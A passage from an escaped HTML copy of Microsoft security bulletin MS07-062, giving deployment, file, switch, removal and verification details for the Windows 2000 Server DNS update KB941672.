class="lastInCell"&gt;&lt;b&gt;Inclusion in Future Service Packs&lt;/b&gt;&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td style="border-right: 1px solid rgb(204, 204, 204);"&gt;&lt;p class="lastInCell"&gt;The update for this issue may be included in a future update rollup&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr class="evenRecord" valign="top"&gt;&lt;td&gt;&lt;p class="lastInCell"&gt;&lt;b&gt;Deployment&lt;/b&gt;&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td style="border-right: 1px solid rgb(204, 204, 204);"&gt;&lt;p class="lastInCell"&gt; &lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr class="record" valign="top"&gt;&lt;td&gt;&lt;p class="lastInCell"&gt;Installing without user intervention&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td style="border-right: 1px solid rgb(204, 204, 204);"&gt;&lt;p&gt;Windows 2000 Server Service Pack 4:&lt;/p&gt;&lt;p&gt;Windows2000-kb941672-x86-enu /quiet&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr class="evenRecord" valign="top"&gt;&lt;td&gt;&lt;p class="lastInCell"&gt;Installing without restarting&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td style="border-right: 1px solid rgb(204, 204, 204);"&gt;&lt;p&gt;Windows 2000 Server Service Pack 4:&lt;/p&gt;&lt;p&gt;Windows2000-kb941672-x86-enu /norestart&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr class="record" valign="top"&gt;&lt;td&gt;&lt;p class="lastInCell"&gt;Further information&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td style="border-right: 1px solid rgb(204, 204, 204);"&gt;&lt;p class="lastInCell"&gt;See the subsection, &lt;b&gt;Microsoft Detection and Deployment Tools and Guidance&lt;/b&gt;&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr class="evenRecord" valign="top"&gt;&lt;td&gt;&lt;p class="lastInCell"&gt;Update log File&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td style="border-right: 1px solid rgb(204, 204, 204);"&gt;&lt;p class="lastInCell"&gt;KB941672.log&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr class="record" valign="top"&gt;&lt;td&gt;&lt;p class="lastInCell"&gt;&lt;b&gt;Restart Requirement&lt;/b&gt;&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td style="border-right: 1px solid rgb(204, 204, 204);"&gt;&lt;p class="lastInCell"&gt; &lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr class="evenRecord" valign="top"&gt;&lt;td&gt;&lt;p class="lastInCell"&gt;Restart required&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td style="border-right: 1px solid rgb(204, 204, 204);"&gt;&lt;p class="lastInCell"&gt;Yes, you must restart your system after you apply this security update&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr class="record" valign="top"&gt;&lt;td&gt;&lt;p class="lastInCell"&gt;Hotpatching&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td style="border-right: 1px solid rgb(204, 204, 204);"&gt;&lt;p class="lastInCell"&gt;Not applicable&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr class="evenRecord" valign="top"&gt;&lt;td&gt;&lt;p class="lastInCell"&gt;&lt;b&gt;Removal Information&lt;/b&gt;&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td style="border-right: 1px solid rgb(204, 204, 204);"&gt;&lt;p class="lastInCell"&gt;Use Add or Remove Programs tool in Control Panel or the Spuninst.exe utility located in the %Windir%\$NTUninstallKB941672$\Spuninst folder&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr class="record" valign="top"&gt;&lt;td&gt;&lt;p class="lastInCell"&gt;&lt;b&gt;File Information&lt;/b&gt;&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td style="border-right: 1px solid rgb(204, 204, 204);"&gt;&lt;p class="lastInCell"&gt;See the next subsection, &lt;b&gt;File Information&lt;/b&gt; for the full file manifest&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr class="evenRecord" valign="top"&gt;&lt;td&gt;&lt;p class="lastInCell"&gt;&lt;b&gt;Registry Key Verification&lt;/b&gt;&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td style="border-right: 1px solid rgb(204, 204, 204);"&gt;&lt;p&gt;Windows 2000 Server Service Pack 4:&lt;/p&gt;&lt;p&gt;HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Updates\Windows 2000\SP5\KB941672\Filelist&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;a name="EVMAC"&gt;&lt;/a&gt;&lt;table border="0" cellpadding="0" cellspacing="0"&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td style="padding: 2px 6px 0px 0px;"&gt;&lt;script language="javascript"&gt;sID='4l3-EVMAC';writePM(sID)&lt;/script&gt;&lt;a href="javascript:Toggle('s4l3-EVMAC')"&gt;&lt;img id="is4l3-EVMAC" src="http://www.microsoft.com/library/gallery/templates/MNP2.Common/images/plus.gif" border="0" height="9" width="9" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td class="secLabel"&gt;&lt;script language="javascript"&gt;startA('s'+sID)&lt;/script&gt;&lt;h5&gt;&lt;a href="javascript:Toggle('s4l3-EVMAC')" style="text-decoration: none;"&gt;File Information&lt;/a&gt;&lt;/h5&gt;&lt;a href="javascript:Toggle('s4l3-EVMAC')" style="text-decoration: none;"&gt;&lt;script language="javascript"&gt;endA()&lt;/script&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;div style="display: none;" id="s4l3-EVMAC"&gt;&lt;script language="javascript"&gt;chkHide('s'+sID);&lt;/script&gt;&lt;div class="expandoIndent"&gt;&lt;p&gt;The English version of this security update has the file attributes that are listed in the following table. The dates and times for these files are listed in coordinated universal time (UTC). When you view the file information, it is converted to local time. To find the difference between UTC and local time, use the &lt;b&gt;Time Zone&lt;/b&gt; tab in the Date and Time tool in Control Panel.&lt;/p&gt;&lt;p&gt;For all supported editions of Microsoft Windows 2000 Server Service Pack 4:&lt;/p&gt;&lt;table class="dataTable" id="E5MAC" cellpadding="0" cellspacing="0" width="87%"&gt;&lt;thead&gt;&lt;tr class="stdHeader" valign="top"&gt;&lt;td id="colEBNAC" width="21%"&gt;File Name&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td id="colEFNAC" width="21%"&gt;Version&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td id="colEJNAC" width="21%"&gt;Date&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td id="colENNAC" width="17%"&gt;Time&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td id="colERNAC" style="border-right: 1px solid rgb(204, 204, 204);" width="16%"&gt;Size&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/thead&gt;&lt;tbody&gt;&lt;tr class="record" valign="top"&gt;&lt;td&gt;&lt;p class="lastInCell"&gt;dns.exe&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td&gt;&lt;p class="lastInCell"&gt;5.0.2195.7147&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td&gt;&lt;p class="lastInCell"&gt;18-Oct-2007&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td&gt;&lt;p class="lastInCell"&gt;03:39&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td style="border-right: 1px solid rgb(204, 204, 204);"&gt;&lt;p class="lastInCell"&gt;330512&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;p&gt;&lt;b&gt;Note&lt;/b&gt; For a complete list of supported versions, see the Support Lifecycle Index. For a complete list of service packs, see &lt;a href="http://support.microsoft.com/gp/LifeSupSps"&gt;Lifecycle Supported Service Packs&lt;/a&gt;. For more information on the support lifecycle policy, see &lt;a href="http://support.microsoft.com/lifecycle/"&gt;Microsoft Support Lifecycle&lt;/a&gt;.&lt;/p&gt;&lt;/div&gt;&lt;div class="secTop"&gt;&lt;a href="http://www.microsoft.com/technet/security/bulletin/ms07-062.mspx#EVMAC"&gt;&lt;img src="http://www.microsoft.com/library/gallery/templates/MNP2.Common/images/arrow_px_up.gif" alt="Top of section" border="0" height="9" width="7" /&gt;&lt;/a&gt;&lt;a class="topOfPage" href="http://www.microsoft.com/technet/security/bulletin/ms07-062.mspx#EVMAC"&gt;Top of section&lt;/a&gt;&lt;/div&gt;&lt;/div&gt;&lt;a name="ENOAC"&gt;&lt;/a&gt;&lt;table border="0" cellpadding="0" cellspacing="0"&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td style="padding: 2px 6px 0px 0px;"&gt;&lt;script language="javascript"&gt;sID='4l3-ENOAC';writePM(sID)&lt;/script&gt;&lt;a href="javascript:Toggle('s4l3-ENOAC')"&gt;&lt;img id="is4l3-ENOAC" src="http://www.microsoft.com/library/gallery/templates/MNP2.Common/images/plus.gif" border="0" height="9" width="9" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td class="secLabel"&gt;&lt;script language="javascript"&gt;startA('s'+sID)&lt;/script&gt;&lt;h5&gt;&lt;a href="javascript:Toggle('s4l3-ENOAC')" style="text-decoration: none;"&gt;Deployment Information&lt;/a&gt;&lt;/h5&gt;&lt;a href="javascript:Toggle('s4l3-ENOAC')" style="text-decoration: none;"&gt;&lt;script language="javascript"&gt;endA()&lt;/script&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;div style="display: none;" id="s4l3-ENOAC"&gt;&lt;script language="javascript"&gt;chkHide('s'+sID);&lt;/script&gt;&lt;div class="expandoIndent"&gt;&lt;p&gt;&lt;b&gt;Installing the Update&lt;/b&gt;&lt;/p&gt;&lt;p&gt;When you install this security update, the installer checks to see if one or more of the files that are being updated on your system have previously been updated by a Microsoft hotfix.&lt;/p&gt;&lt;p&gt;For more information about the terminology that appears in this bulletin, such as &lt;i&gt;hotfix&lt;/i&gt;, see &lt;a href="http://support.microsoft.com/kb/824684"&gt;Microsoft Knowledge Base Article 824684&lt;/a&gt;.&lt;/p&gt;&lt;p&gt;This security update supports the following setup switches.&lt;/p&gt;&lt;table class="dataTable" id="E5OAC" cellpadding="0" cellspacing="0" width="69%"&gt;&lt;thead&gt;&lt;tr&gt;&lt;td class="tableHeader" colspan="2"&gt;Supported Security Update Installation Switches&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr class="stdHeader" valign="top"&gt;&lt;td id="colECPAC" width="37%"&gt;Switch&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td id="colEGPAC" style="border-right: 1px solid rgb(204, 204, 204);" width="62%"&gt;Description&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/thead&gt;&lt;tbody&gt;&lt;tr class="record" valign="top"&gt;&lt;td&gt;&lt;p class="lastInCell"&gt;&lt;b&gt;/help&lt;/b&gt;&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td style="border-right: 1px solid rgb(204, 204, 204);"&gt;&lt;p class="lastInCell"&gt;Displays the command-line options&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr class="subHeader"&gt;&lt;td&gt;Setup Modes&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr class="record" valign="top"&gt;&lt;td&gt;&lt;p class="lastInCell"&gt;&lt;b&gt;/passive&lt;/b&gt;&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td style="border-right: 1px solid rgb(204, 204, 204);"&gt;&lt;p class="lastInCell"&gt;Unattended Setup mode. No user interaction is required, but installation status is displayed. If a restart is required at the end of Setup, a dialog box will be presented to the user with a timer warning that the computer will restart in 30 seconds.&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr class="evenRecord" valign="top"&gt;&lt;td&gt;&lt;p class="lastInCell"&gt;&lt;b&gt;/quiet&lt;/b&gt;&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td style="border-right: 1px solid rgb(204, 204, 204);"&gt;&lt;p class="lastInCell"&gt;Quiet mode. This is the same as unattended mode, but no status or error messages are displayed.&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr class="subHeader"&gt;&lt;td&gt;Restart Options&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr class="record" valign="top"&gt;&lt;td&gt;&lt;p class="lastInCell"&gt;&lt;b&gt;/norestart&lt;/b&gt;&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td style="border-right: 1px solid rgb(204, 204, 204);"&gt;&lt;p class="lastInCell"&gt;Does not restart when installation has completed&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr class="evenRecord" valign="top"&gt;&lt;td&gt;&lt;p class="lastInCell"&gt;&lt;b&gt;/forcerestart&lt;/b&gt;&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td style="border-right: 1px solid rgb(204, 204, 204);"&gt;&lt;p class="lastInCell"&gt;Restarts the computer after installation and force other applications to close at shutdown without saving open files first.&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr class="record" valign="top"&gt;&lt;td&gt;&lt;p class="lastInCell"&gt;&lt;b&gt;/warnrestart[:x]&lt;/b&gt;&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td style="border-right: 1px solid rgb(204, 204, 204);"&gt;&lt;p class="lastInCell"&gt;Presents a dialog box with a timer warning the user that the computer will restart in &lt;i&gt;x&lt;/i&gt; seconds. (The default setting is 30 seconds.) Intended for use with the &lt;b&gt;/quiet&lt;/b&gt; switch or the &lt;b&gt;/passive&lt;/b&gt; switch.&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr class="evenRecord" valign="top"&gt;&lt;td&gt;&lt;p class="lastInCell"&gt;&lt;b&gt;/promptrestart&lt;/b&gt;&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td style="border-right: 1px solid rgb(204, 204, 204);"&gt;&lt;p class="lastInCell"&gt;Display a dialog box prompting the local user to allow a restart&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr class="subHeader"&gt;&lt;td&gt;Special Options&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr class="record" valign="top"&gt;&lt;td&gt;&lt;p class="lastInCell"&gt;&lt;b&gt;/overwriteoem&lt;/b&gt;&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td style="border-right: 1px solid rgb(204, 204, 204);"&gt;&lt;p class="lastInCell"&gt;Overwrites OEM files without prompting&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr class="evenRecord" valign="top"&gt;&lt;td&gt;&lt;p class="lastInCell"&gt;&lt;b&gt;/nobackup&lt;/b&gt;&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td style="border-right: 1px solid rgb(204, 204, 204);"&gt;&lt;p class="lastInCell"&gt;Does not back up files needed for uninstall&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr class="record" valign="top"&gt;&lt;td&gt;&lt;p class="lastInCell"&gt;&lt;b&gt;/forceappsclose&lt;/b&gt;&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td style="border-right: 1px solid rgb(204, 204, 204);"&gt;&lt;p class="lastInCell"&gt;Forces other programs to close when the computer shuts down&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr class="evenRecord" valign="top"&gt;&lt;td&gt;&lt;p class="lastInCell"&gt;&lt;b&gt;/log:path&lt;/b&gt;&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td style="border-right: 1px solid rgb(204, 204, 204);"&gt;&lt;p class="lastInCell"&gt;Allows the redirection of installation log files&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr class="record" valign="top"&gt;&lt;td&gt;&lt;p class="lastInCell"&gt;&lt;b&gt;/extract[:path]&lt;/b&gt;&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td style="border-right: 1px solid rgb(204, 204, 204);"&gt;&lt;p class="lastInCell"&gt;Extracts files without starting the Setup program&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr class="evenRecord" valign="top"&gt;&lt;td&gt;&lt;p class="lastInCell"&gt;&lt;b&gt;/ER&lt;/b&gt;&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td style="border-right: 1px solid rgb(204, 204, 204);"&gt;&lt;p class="lastInCell"&gt;Enables extended error reporting&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr class="record" valign="top"&gt;&lt;td&gt;&lt;p class="lastInCell"&gt;&lt;b&gt;/verbose&lt;/b&gt;&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td style="border-right: 1px solid rgb(204, 204, 204);"&gt;&lt;p class="lastInCell"&gt;Enables verbose logging. During installation, creates %Windir%\CabBuild.log. This log details the files that are copied. Using this switch may cause the installation to proceed more slowly.&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;p&gt;&lt;b&gt;Note &lt;/b&gt;You can combine these switches into one command. For backward compatibility, the security update also supports the setup switches that the earlier version of the Setup program uses. For more information about the supported installation switches, see &lt;a href="http://support.microsoft.com/kb/262841"&gt;Microsoft Knowledge Base Article 262841&lt;/a&gt;. For more information about the Update.exe installer, visit the &lt;a href="http://go.microsoft.com/fwlink/?LinkId=38951"&gt;Microsoft TechNet Web site&lt;/a&gt;.&lt;/p&gt;&lt;p&gt;&lt;b&gt;Removing the Update&lt;/b&gt;&lt;/p&gt;&lt;p&gt;This security update supports the following setup switches.&lt;/p&gt;&lt;table class="dataTable" id="EODAE" cellpadding="0" cellspacing="0" width="69%"&gt;&lt;thead&gt;&lt;tr&gt;&lt;td class="tableHeader" colspan="2"&gt;Supported Spuninst.exe Switches&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr class="stdHeader" valign="top"&gt;&lt;td id="colESDAE" width="37%"&gt;Switch&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td id="colEWDAE" style="border-right: 1px solid rgb(204, 204, 204);" width="62%"&gt;Description&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/thead&gt;&lt;tbody&gt;&lt;tr class="record" valign="top"&gt;&lt;td&gt;&lt;p class="lastInCell"&gt;&lt;b&gt;/help&lt;/b&gt;&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td style="border-right: 1px solid rgb(204, 204, 204);"&gt;&lt;p class="lastInCell"&gt;Displays the command-line options&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr class="subHeader"&gt;&lt;td&gt;Setup Modes&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr class="record" valign="top"&gt;&lt;td&gt;&lt;p class="lastInCell"&gt;&lt;b&gt;/passive&lt;/b&gt;&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td style="border-right: 1px solid rgb(204, 204, 204);"&gt;&lt;p class="lastInCell"&gt;Unattended Setup mode. No user interaction is required, but installation status is displayed. If a restart is required at the end of Setup, a dialog box will be presented to the user with a timer warning that the computer will restart in 30 seconds.&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr class="evenRecord" valign="top"&gt;&lt;td&gt;&lt;p class="lastInCell"&gt;&lt;b&gt;/quiet&lt;/b&gt;&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td style="border-right: 1px solid rgb(204, 204, 204);"&gt;&lt;p class="lastInCell"&gt;Quiet mode. This is the same as unattended mode, but no status or error messages are displayed.&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr class="subHeader"&gt;&lt;td&gt;Restart Options&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr class="record" valign="top"&gt;&lt;td&gt;&lt;p class="lastInCell"&gt;&lt;b&gt;/norestart&lt;/b&gt;&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td style="border-right: 1px solid rgb(204, 204, 204);"&gt;&lt;p class="lastInCell"&gt;Does not restart when installation has completed&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr class="evenRecord" valign="top"&gt;&lt;td&gt;&lt;p class="lastInCell"&gt;&lt;b&gt;/forcerestart&lt;/b&gt;&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td style="border-right: 1px solid rgb(204, 204, 204);"&gt;&lt;p class="lastInCell"&gt;Restarts the computer after installation and force other applications to close at shutdown without saving open files first.&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr class="record" valign="top"&gt;&lt;td&gt;&lt;p class="lastInCell"&gt;&lt;b&gt;/warnrestart[:x]&lt;/b&gt;&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td style="border-right: 1px solid rgb(204, 204, 204);"&gt;&lt;p class="lastInCell"&gt;Presents a dialog box with a timer warning the user that the computer will restart in &lt;i&gt;x&lt;/i&gt; seconds. (The default setting is 30 seconds.) Intended for use with the &lt;b&gt;/quiet&lt;/b&gt; switch or the &lt;b&gt;/passive&lt;/b&gt; switch.&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr class="evenRecord" valign="top"&gt;&lt;td&gt;&lt;p class="lastInCell"&gt;&lt;b&gt;/promptrestart&lt;/b&gt;&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td style="border-right: 1px solid rgb(204, 204, 204);"&gt;&lt;p class="lastInCell"&gt;Display a dialog box prompting the local user to allow a restart&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr class="subHeader"&gt;&lt;td&gt;Special Options&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr class="record" valign="top"&gt;&lt;td&gt;&lt;p class="lastInCell"&gt;&lt;b&gt;/forceappsclose&lt;/b&gt;&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td style="border-right: 1px solid rgb(204, 204, 204);"&gt;&lt;p class="lastInCell"&gt;Forces other programs to close when the computer shuts down&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr class="evenRecord" valign="top"&gt;&lt;td&gt;&lt;p class="lastInCell"&gt;&lt;b&gt;/log:path&lt;/b&gt;&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td style="border-right: 1px solid rgb(204, 204, 204);"&gt;&lt;p class="lastInCell"&gt;Allows the redirection of installation log files&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;p&gt;&lt;b&gt;Verifying That the Update Has Been Applied&lt;/b&gt;&lt;/p&gt;&lt;table border="0" cellpadding="0" cellspacing="0"&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td class="listBullet" valign="top"&gt;•&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td class="listItem"&gt;&lt;p&gt;&lt;b&gt;Microsoft Baseline Security Analyzer&lt;/b&gt;&lt;/p&gt;&lt;p&gt;To verify that a security update has been applied to an affected system, you may be able to use the Microsoft Baseline Security Analyzer (MBSA) tool. See the section, Detection and Deployment Tools and Guidance, earlier in this bulletin for more information.&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="listBullet" valign="top"&gt;•&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td class="listItem"&gt;&lt;p&gt;&lt;b&gt;File Version Verification&lt;/b&gt;&lt;/p&gt;&lt;p&gt;Because there are several versions of Microsoft Windows, the following steps may be different on your computer. If they are, see your product documentation to complete these steps.&lt;/p&gt;&lt;table class="numberedList" border="0" cellpadding="0" cellspacing="0"&gt;&lt;tbody&gt;&lt;tr valign="top"&gt;&lt;td class="listNumber" align="right" nowrap="nowrap"&gt;&lt;p&gt;1.&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td&gt;&lt;p&gt;Click &lt;b&gt;Start&lt;/b&gt;, and then click &lt;b&gt;Search&lt;/b&gt;.&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr valign="top"&gt;&lt;td class="listNumber" align="right" nowrap="nowrap"&gt;&lt;p&gt;2.&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td&gt;&lt;p&gt;In the &lt;b&gt;Search Results&lt;/b&gt; pane, click &lt;b&gt;All files and folders&lt;/b&gt; under &lt;b&gt;Search Companion&lt;/b&gt;.&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr valign="top"&gt;&lt;td class="listNumber" align="right" nowrap="nowrap"&gt;&lt;p&gt;3.&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td&gt;&lt;p&gt;In the &lt;b&gt;All or part of the file name &lt;/b&gt;box, type a file name from the appropriate file information table, and then click &lt;b&gt;Search&lt;/b&gt;.&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr valign="top"&gt;&lt;td class="listNumber" align="right" nowrap="nowrap"&gt;&lt;p&gt;4.&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td&gt;&lt;p&gt;In the list of files, right-click a file name from the appropriate file information table, and then click &lt;b&gt;Properties&lt;/b&gt;.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Note&lt;/b&gt; Depending on the version of the operating system or programs installed, some of the files that are listed in the file information table may not be installed.&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr valign="top"&gt;&lt;td class="listNumber" align="right" nowrap="nowrap"&gt;&lt;p&gt;5.&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td&gt;&lt;p&gt;On the &lt;b&gt;Version&lt;/b&gt; tab, determine the version of the file that is installed on your computer by comparing it to the version that is documented in the appropriate file information table.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Note&lt;/b&gt; Attributes other than the file version may change during installation. Comparing other file attributes to the information in the file information table is not a supported method of verifying that the update has been applied. Also, in certain cases, files may be renamed during installation. 